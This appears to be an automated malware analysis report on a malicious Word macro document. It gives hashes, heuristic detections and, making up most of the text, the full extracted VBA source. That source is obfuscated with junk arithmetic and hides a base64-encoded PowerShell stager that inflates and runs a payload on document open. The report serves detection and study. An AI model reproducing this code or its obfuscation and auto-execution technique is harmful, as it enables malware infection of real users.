Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5f4d98328b28d15a…

MALICIOUS

Office (OLE)

97.0 KB Created: 2018-06-01 15:54:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: 728ba1a12370e2742cc673806e59978d SHA-1: 2819b9fc023143e49266bf506a65e76074824e7a SHA-256: 5f4d98328b28d15ad35fb7dadc2d7bdb61f00458ad11fe45c6d347486260c8ae
150 Risk Score

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    HnTGoD = CSng(54335 * CInt(61172) + 7493 - 78968)
    uibHIc = oaqivfzkbRZ + Shell(uBUVdDWwb + Chr(vbKeyP) + JiHJpfwpl + waotA + PIuhQC + DhiBaAHqKdt + wjcaHrlizD, OXTVTfl + vbHide + XVaYNJzzA)
    ukVArD = 62867 + Log(8946) - YAjHqp / Atn(9756) / tLkEX / HuIpJk
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub Autoopen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10650 bytes
SHA-256: a50f4f6d48ffa8332ba4c36f328ddfcd185a9f6eb34edfc1e56ffb542f5f5a29
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "tdFNRaQVsjio"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function uibHIc()
On Error Resume Next
YuOaOu = 74629 + Log(55957) - IDlKlO / Atn(84854) / jTziu / zOJji
zisoU = CSng(56708 * CInt(51425) + 47295 - 4207)
PVCqOP = 39850 + Log(47690) - hcwzn / Atn(6854) / drQLFK / JfiKw
HnTGoD = CSng(54335 * CInt(61172) + 7493 - 78968)
uibHIc = oaqivfzkbRZ + Shell(uBUVdDWwb + Chr(vbKeyP) + JiHJpfwpl + waotA + PIuhQC + DhiBaAHqKdt + wjcaHrlizD, OXTVTfl + vbHide + XVaYNJzzA)
ukVArD = 62867 + Log(8946) - YAjHqp / Atn(9756) / tLkEX / HuIpJk
QZCiRU = CSng(80585 * CInt(6357) + 33383 - 53648)
End Function
Sub Autoopen()
On Error Resume Next
GLRHEL = 29975 + Log(98584) - LmsEdW / Atn(3076) / GjOXU / IahZZ
PNbjn = CSng(97547 * CInt(23222) + 34230 - 99088)
uibHIc
waJmQd = 63027 + Log(95393) - uTbwi / Atn(26573) / lBIjW / piizKJ
iKjOQ = CSng(74018 * CInt(76863) + 26414 - 64589)
End Sub


Attribute VB_Name = "ftjTiBnQtVNMKJ"
Function JiHJpfwpl()
On Error Resume Next
GUYOE = 81629 + Log(61093) - aoEWBA / Atn(16526) / wJuodU / ZDoud
OKaNEH = CSng(24403 * CInt(27696) + 93931 - 88975)
RpzYtmjGdh = "owersHeLL -" + "e KABu" + "AGUAVwAtA" + "G8AQ" + "gBKAGUAQ" + "wB" + "UACAAaQBPAC4A" + "YwBPAE0AcAByAGU" + "AUwB" + "zAGkATwBOAC4AZ"
IFkkjp = 7898 + Log(50958) - KmwkU / Atn(55466) / JwLQwC / LddIw
vOCPGj = CSng(46565 * CInt(69153) + 50431 - 87454)
OsSdfpaUk = "ABl" + "AEYAbABh" + "AH" + "QAZQBTA" + "HQ" + "AUg"
kTGTc = 23198 + Log(82171) - cVCPld / Atn(84274) / kYHCj / hbvki
oECjFz = CSng(61796 * CInt(54059) + 93131 - 3009)
dRBwwqHbqj = "BlA" + "EEATQAoAF" + "sA" + "cw" + "B5AFMAdAB" + "FAG0ALgB" + "pAE8AL" + "gBtAGUAbQBvAFIA"
RmQUYs = 98530 + Log(32124) - PaoLTq / Atn(63481) / miYsdN / XTTKn
PJippQ = CSng(31555 * CInt(75540) + 17375 - 66142)
jpQbjBsBDRE = "WQBzAHQAUg" + "BFAGEATQBdACAAW" + "wBDAG8ATgB2A" + "GUAcgB0AF0AOgA6"
TzOOQr = 31652 + Log(28204) - DpRdq / Atn(77289) / MwFZo / ozRFVd
QpdwbZ = CSng(61732 * CInt(98676) + 79423 - 13351)
HnXhIniPUfH = "AEYAcgBP" + "AE0AY" + "gBBAHMA" + "RQA2ADQAUwBUAFI" + "ASQBOA" + "GcAKAAn" + "AFQAWg"
CvWuar = 9907 + Log(98593) - qDqEI / Atn(14712) / IOzLWn / AOLVBR
ZXpdW = CSng(86660 * CInt(12359) + 88408 - 48107)
juhpbi = "BKA" + "FIAYg" + "A1A" + "HMAdwBGAEkAWAB" + "mAEoA" + "KwAwAC8AVw" + "BCAEcAcQBRAFQ" + "AU"
AVbjM = 98004 + Log(49527) - TiXkrv / Atn(11216) / HWjOW / htRjA
mOjOpX = CSng(20825 * CInt(372) + 22571 - 9276)
sEfSoZ = "gBtAG" + "IAVgArAG0Ab" + "wBrAG4AZABFAGs" + "AMw" + "BLA" + "FMALw" + "BiAE" + "EAcABxADcAUw" + "BI" + "AG4AQw"
JiHJpfwpl = RpzYtmjGdh + OsSdfpaUk + dRBwwqHbqj + jpQbjBsBDRE + HnXhIniPUfH + juhpbi + sEfSoZ
End Function
Function waotA()
On Error Resume Next
Plhhik = 79520 + Log(60168) - XGljNK / Atn(6315) / ohSfww / FzIuT
FDCjRd = CSng(77331 * CInt(41412) + 98133 - 16888)
DQQVlUzJkUJ = "Bj" + "AEcAMg" + "BBAE" + "YARwA0AEUAVABpA" + "HEATAA4ADk" + "AOQAxAEQA"
BGDfdz = 2124 + Log(60670) - NMdmH / Atn(32049) / jcjcuL / RCiAw
PbpZqi = CSng(84381 * CInt(91021) + 41115 - 54621)
dzHiidcVtqU = "cwByAFoA" + "SQAxAD" + "kAagBtADgAegAz" + "AG4ANABo" + "AHYAWQBYAG0AOQ" + "AxAHYAeA" + "BWA" + "GYA"
HPzXta = 31286 + Log(52699) - qHtPj / Atn(63814) / zlcuzE / FmWEvd
rLzkU = CSng(59980 * CInt(23107) + 73013 - 46318)
zItaivYNiiX = "eABGAFUAbwB" + "yAF" + "kAdwBsAHkAVABpA" + "FUAdwA5AHgAdA" + "Av" + "AG0ASgBoAFo" + "AQgBSAEwATAB" + "5AFAAUg"
SZwrHi = 49473 + Log(86021) - ouJsi / Atn(254) / QtkWV / wbwvt
LBiLNA = CSng(52830 * CInt(49103) + 16444 - 14214)
hUPPifK = "BhAGIAdAAxA" + "FQAUgBv" + "ADg" + "AUABm" + "ADEAaQBWAGoA" + "SABMAG8AQgB3AE" + "EAdgA3AEUAV"
EzLmoi = 65654 + Log(36701) - kSOSB / Atn(2769) / wbUsM / uhHKiv
GauJvj = CSng(48907 * CInt(18721) + 66342 - 18185)
oVRiWa = "ABHAG8AbABzA" + "DcARA" + "AwADEAYQB" + "rADEAZQ" + "BQAGQASgBtA" + "FUAVg" + "BkA" + "GsA" + "ZgBS" + "AHEAcwBzADI"
Qcbutn = 22775 + Log(19563) - tdwoO / Atn(72292) / Ciiiv / aKJXEW
czPRW = CSng(54037 * CInt(68450) + 26367 - 614)
GLcbiBSXQP = "AOQA4AE0A" + "cgBnAEk" + "ASwBrAHMAdgBQAH" + "IAegA1AHgATQ"
TwYjwd = 54397 + Log(11491) - KRXfDi / Atn(4006) / BQkVip / kwNjRm
BCqKj = CSng(43280 * CInt(6165) + 54045 - 64405)
YGnZa = "ArADEA" + "dQB" + "QADEAOABlADM" + "ATgAzAEYAN" + "gBYAEIAMQArA" + "FgAaQBOA" + "DA"
RKLDES = 22282 + Log(74855) - whzPS / Atn(71029) / jwCPv / HIQUot
faZjDD = CSng(47611 * CInt(56912) + 73448 - 60382)
iBPkl = "ATwBo" + "AC8AUA" + "BpAGgAOQBKAD" + "cAegB0A"
CtwoUE = 74033 + Log(46174) - XnEZS / Atn(72589) / CDmjdS / pXIOMP
fzTYN = CSng(4087 * CInt(84441) + 36939 - 77506)
rHdUlwKFsh = "GYAZABKAE" + "EAbABmAHUAd" + "wBJAE4AdQB" + "NAEsAcwBuAG8" + "AWAAyAHQATwA4"
waotA = DQQVlUzJkUJ + dzHiidcVtqU + zItaivYNiiX + hUPPifK + oVRiWa + GLcbiBSXQP + YGnZa + iBPkl + rHdUlwKFsh
End Function
Function PIuhQC()
On Error Resume Next
iQTbs = 43134 + Log(179) - RZWaz / Atn(91199) / jFHRL / aINspk
EjljP = CSng(51706 * CInt(2867) + 25226 - 97683)
wzwClYKNqwo = "AFYAdgA" + "0ADUAbwBFAFI" + "AdABvADUAZ" + "ABoADIASAA5" + "AGU" + "AYwB" + "xAGUASg" + "BMA" + "DQAawBoA" + "HIAcQBFAHoAKwB"
wBIwu = 79278 + Log(80345) - wYYdw / Atn(70130) / cWIHF / ClzMho
KYtnls = CSng(20634 * CInt(30850) + 6688 - 86692)
HwlUawhj = "3AGcAMwBGA" + "FgANwBUAHkAUgBC" + "AFYANQB4AE4AT" + "ABvA" + "EEAMQBYA" + "E0AawB" + "IAGYAYQBLAEUA" + "ZwBYAG8AcgB" + "uAE8AR"
TXmrMc = 53171 + Log(74600) - hmEtF / Atn(86244) / uPJkMA / uZikr
ZmZcc = CSng(77173 * CInt(65687) + 92365 - 20691)
toUwiCRTvu = "ABhAG0" + "AMwB4AH" + "cAQQA0AGcA" + "Mw" + "AzAGIAVQ" + "BWAE4AVABO" + "AEEAZABk" + "ADAAMABCADQAaQB" + "yADkAbwBEAFQ" + "AT"
WkvnG = 46369 + Log(37427) - hsNQA / Atn(89139) / SSVsS / sjibuN
QRKijq = CSng(74827 * CInt(283) + 34245 - 25482)
zZzsBka = "AA3A" + "FQASgByAGk" + "ARgBNAEU" + "AeABBA" + "G0AMAB"
WGdCzq = 17526 + Log(71918) - UKVMDs / Atn(81946) / ANMLKr / QhfhKH
AFYWL = CSng(9670 * CInt(79956) + 69342 - 83452)
aRQOVPN = "hAEMAa" + "ABPAHMASQBvA" + "HYAaABxAEUAd" + "QBNAG0" + "ANgB0AFUAb" + "gBMA" + "EEAdwB0ADgAa"
JiHFw = 95762 + Log(58946) - zIzEBl / Atn(22649) / smRKb / XMJPnh
loQVuB = CSng(53246 * CInt(69648) + 58854 - 39738)
RsjpO = "QBOAEoANAB" + "SAF" + "QAbQB0AHUARABo" + "AGcAYQBPADgAc" + "wB" + "PAHcARwA"
BqKwIv = 8717 + Log(76532) - zMDSj / Atn(81453) / LuwjJz / OUijH
kiORiJ = CSng(71724 * CInt(31549) + 47744 - 6627)
VlizSTVA = "0AEM" + "AWAA2" + "AHA" + "AcQBwAHgAZQ" + "B2AHkAZgB4AG8AQ"
LAWjZ = 70803 + Log(97625) - DTQpio / Atn(50079) / jwdaM / EaSzmk
FSmri = CSng(40669 * CInt(18580) + 51402 - 51475)
IQKSSuhRo = "QByAD" + "kAdABoAF" + "MAYwBLAF" + "oATQBxAHkAMw" + "BWAEUAMwB2AD" + "IARA" + "BC" + "AEMAKwBMADk" + "AawBq" + "AGwAYgBWAD"
PIuhQC = wzwClYKNqwo + HwlUawhj + toUwiCRTvu + zZzsBka + aRQOVPN + RsjpO + VlizSTVA + IQKSSuhRo
End Function
Function DhiBaAHqKdt()
On Error Resume Next
jjuDQT = 79151 + Log(61318) - IFETuc / Atn(2260) / vwQbw / SwAdz
TQdFH = CSng(88640 * CInt(82795) + 35633 - 88594)
razwsUSXkz = "EAN" + "QBVAE0" + "AVwA0" + "AFY"
GdRJbR = 313 + Log(96674) - OhHNiK / Atn(24583) / UcEPqr / JrczLA
iTIpmJ = CSng(79738 * CInt(74534) + 1832 - 96987)
RvhrFbRD = "AKwBmAEwAU" + "gBlADQAS" + "AByAEsASAArAD" + "MAYQAvAHEAUw" + "BzAGoAWQB" + "pAEgALwBT" + "AE" + "IANg" + "BuAG0ANAB"
ljTLC = 97388 + Log(91233) - IWqpYP / Atn(73713) / zkoAmq / wnFoXC
ibGMEI = CSng(24212 * CInt(96264) + 78923 - 57956)
TNKmLlSNFc = "0AEYARwBFAG8" + "ARgBuAFIA" + "ZQAw" + "AEIAUABHAF" + "IASABkAGUA" + "awBUAFIAawBHAHU" + "AdAA4AFoAVQB" + "WAGsAeAB" + "YAFYAOQAwADkATg" + "AxADQAUg"
QrPsi = 68939 + Log(49823) - XqCMz / Atn(31374) / GUXwKY / NoPiLL
ZBvKzV = CSng(98060 * CInt(25668) + 12052 - 18210)
VvalJtDjt = "BKACsAbwAy" + "AGQA" + "TABsAGoANwBiAE" + "8AZgArAGoAdAA" + "5ADEAVgBl" + "AD" + "AAKwB5AE0A"
OWiFf = 27946 + Log(16995) - KBrasU / Atn(60832) / ibcvY / WwoHC
uvsOO = CSng(52202 * CInt(91255) + 3023 - 25833)
wClbolr = "cQB0A" + "GwAUABsAC8AawB1" + "AHIALwBKADEATQ" + "BRA" + "HUAagBhAH" + "cASAB0AEsATAA" + "xAGkAZwBSA" + "FgAKwB5ADgA"
IAaOB = 54749 + Log(64621) - DqRzUl / Atn(56539) / zzAjQ / MIBOI
LQYiKW = CSng(36388 * CInt(53979) + 41244 - 18795)
fJjMzfdB = "RgBCADQ" + "AU" + "gBtAHQ" + "AUgBYAE4A" + "ZQByADYAW" + "QBLA" + "EcAKwA2AHMAOABF"
tQNDM = 67414 + Log(95473) - HkAdvB / Atn(63082) / joRMmT / PmRnm
TBsnmG = CSng(30632 * CInt(6074) + 39507 - 99903)
zVJAjtFu = "AHg" + "AdQBXAFAAYwA1A" + "FAAUgBuAHQAV" + "ABYAG" + "sAOABuAGY" + "ANABCACcA" + "KQAgACw" + "AIABbAFMAWQ" + "BTAHQAZQB" + "NAC"
EmBsL = 75191 + Log(55759) - ijinDw / Atn(51864) / MwRuvL / ojHqJu
nPosI = CSng(99830 * CInt(34467) + 21996 - 8207)
lWPjjmQqj = "4AaQ" + "BvAC4AQwBPAE0A" + "UABSAEUAcw" + "BTAGkAbwBOAC4AQ" + "wBPAG0AcAByA"
oKHRkN = 78424 + Log(82065) - jDFCF / Atn(56942) / INIDwT / NsTwLo
IBtSGl = CSng(6877 * CInt(24763) + 7565 - 41805)
QREzuXGrkj = "GUAUwBTAEkA" + "TwBuA" + "E0AbwBEAGUAX" + "QA6ADoARABFAGM" + "ATwBN" + "AFA" + "AcgBFA" + "HMAUwApA" + "HwAIA"
DhiBaAHqKdt = razwsUSXkz + RvhrFbRD + TNKmLlSNFc + VvalJtDjt + wClbolr + fJjMzfdB + zVJAjtFu + lWPjjmQqj + QREzuXGrkj
End Function
Function wjcaHrlizD()
On Error Resume Next
zwONi = 24235 + Log(68003) - QrECA / Atn(4564) / cuYQP / CkXCLk
spvJnk = CSng(94550 * CInt(40803) + 36359 - 99411)
PwqkGFkZdsj = "BmAE8AcgBlA" + "GEAQwBIAC0" + "AbwBCAEoARQBDA" + "FQAew" + "AgAG4AZQBXAC0Ab" + "wBCAEoA" + "ZQBDAFQAIABJAG8"
GPwYj = 7934 + Log(97596) - QkIIon / Atn(12606) / zOrLXc / WavuPQ
zJuPJ = CSng(99654 * CInt(63178) + 58563 - 417)
WAivCj = "ALgBzAH" + "QAcgB" + "lAEEATQByAG" + "UAQ" + "QB" + "EAE" + "UAcgAo"
DSUOk = 61831 + Log(15088) - juAHb / Atn(77096) / ifazoJ / cKlwOY
GISNXI = CSng(10390 * CInt(15540) + 41698 - 72929)
MJzzI = "ACAAJABf" + "AC" + "wAWwBUAGUAeABU" + "AC4ARQ" + "BOAGMA" + "TwBkAGkATgBHAF0"
nXiWFs = 65605 + Log(13167) - fUGhLJ / Atn(38065) / JdmSis / lhtEf
WJoCBl = CSng(1659 * CInt(10606) + 11185 - 85103)
tuAfZQG = "AOgA6A" + "EEAcwBjAEkASQAg" + "ACkAfQAgACkALgB" + "yAGUAQQBkAFQ" + "ATwBFAG4AZA" + "AoACAA" + "KQB"
HvwmC = 71768 + Log(4576) - oPwsz / Atn(55134) / iIlXz / bwIKSf
YSkDl = CSng(42100 * CInt(21100) + 75555 - 89520)
XCjqf = "8ACYAIAAoACAA" + "JABlAG4AdgA" + "6AGMAbwBNAFMAUA" + "BlAGMAWwA0ACw" + "AMQA1ACwAMgA" + "1AF0ALQB" + "KAG8ASQB" + "OACcAJwAp"
jwqqrR = 45558 + Log(33128) - ZwGsUi / Atn(85440) / jzpbkG / pVivHd
RkUBb = CSng(17664 * CInt(74459) + 69013 - 59706)
zUDVai = "AA=="
wjcaHrlizD = PwqkGFkZdsj + WAivCj + MJzzI + tuAfZQG + XCjqf + zUDVai
End Function